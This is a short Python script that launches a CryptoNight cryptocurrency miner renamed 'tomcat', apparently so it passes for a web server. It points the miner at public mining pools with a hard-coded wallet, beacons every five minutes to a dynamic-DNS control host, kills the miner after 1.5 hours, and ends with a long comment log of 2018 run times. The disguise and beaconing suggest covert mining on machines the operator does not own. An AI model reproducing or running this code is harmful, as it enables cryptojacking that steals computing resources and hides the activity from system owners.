import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:15:05.614333
#2018-02-17 17:04:05.389260
#2018-02-17 18:52:06.100568
#2018-02-17 20:41:06.738515
#2018-02-17 22:28:01.702114
#2018-02-18 00:11:03.784815
#2018-02-18 02:02:07.369682
#2018-02-18 03:49:05.680899
#2018-02-18 05:36:06.441777
#2018-02-18 07:29:07.063215
#2018-02-18 09:17:06.841227
#2018-02-18 11:03:01.648471
#2018-02-18 12:49:01.808402
#2018-02-18 14:37:03.570850
#2018-02-18 16:26:06.319519
#2018-02-18 18:14:06.507478
#2018-02-18 20:00:01.907514
#2018-02-18 21:46:07.308058
#2018-02-18 23:36:04.553859
#2018-02-19 01:22:04.707027
#2018-02-19 03:11:04.414587
#2018-02-19 04:56:05.584415
#2018-02-19 06:41:01.277676
#2018-02-19 08:31:05.448885
#2018-02-19 10:20:07.287012
#2018-02-19 12:08:06.072757
#2018-02-19 13:57:07.827261
#2018-02-19 15:46:09.279190
#2018-02-19 17:35:07.682908
#2018-02-19 19:23:07.390196
#2018-02-19 21:10:09.270639
#2018-02-19 22:57:05.655369
#2018-02-20 00:40:04.534195
#2018-02-20 02:28:06.895978
#2018-02-20 04:18:07.700017
#2018-02-20 06:02:01.797172
#2018-02-20 07:46:08.162651
#2018-02-20 09:31:04.210889
#2018-02-20 11:14:01.734872
#2018-02-20 13:01:12.517204
#2018-02-20 14:45:01.828705
#2018-02-20 16:32:05.755214
#2018-02-20 18:19:04.703296
#2018-02-20 20:10:09.898760
#2018-02-20 21:57:03.896874
#2018-02-20 23:39:04.991716
#2018-02-21 01:23:07.102766
#2018-02-21 03:12:04.224096
#2018-02-21 04:59:01.719819
#2018-02-21 06:47:07.280298
#2018-02-21 08:31:05.746047
#2018-02-21 10:17:07.178331
#2018-02-21 12:05:10.929708
#2018-02-21 13:54:09.125217
#2018-02-21 15:40:10.298552
#2018-02-21 17:31:09.679471
#2018-02-21 19:18:01.461809
#2018-02-21 21:06:01.250874
#2018-02-21 22:53:01.707759
#2018-02-22 00:40:08.005852
#2018-02-22 02:29:01.491219
#2018-02-22 04:15:08.623660
#2018-02-22 06:02:04.386417
#2018-02-22 07:47:03.486772
#2018-02-22 09:35:09.064887
#2018-02-22 11:21:09.212956
#2018-02-22 13:06:08.888205
#2018-02-22 14:54:04.018758
#2018-02-22 16:39:09.414443
#2018-02-22 18:25:04.205667
#2018-02-22 20:18:09.142039
#2018-02-22 22:04:04.590154
#2018-02-22 23:51:04.131319
#2018-02-23 01:39:04.393396
#2018-02-23 03:25:06.937454
#2018-02-23 05:11:03.511431
#2018-02-23 06:55:07.927048
#2018-02-23 08:46:07.005648
#2018-02-23 11:04:08.371917
#2018-02-23 12:58:10.066957
#2018-02-23 14:43:06.549412
#2018-02-23 16:33:08.471347
#2018-02-23 18:21:08.282549
#2018-02-23 20:05:08.319049
#2018-02-23 21:52:06.816245
#2018-02-23 23:42:07.315754
#2018-02-24 01:32:05.152792
#2018-02-24 03:21:05.595896
#2018-02-24 05:08:01.772621
#2018-02-24 06:57:01.430230
#2018-02-24 08:47:05.991382
#2018-02-24 10:47:07.624234
#2018-02-24 12:34:07.151866
#2018-02-24 14:23:04.149972
#2018-02-24 16:11:06.957352
#2018-02-24 18:03:04.677235
#2018-02-24 19:50:08.311719
#2018-02-24 21:35:01.861995
#2018-02-25 00:23:03.584061
#2018-02-25 03:29:03.266095
#2018-02-25 07:19:06.215082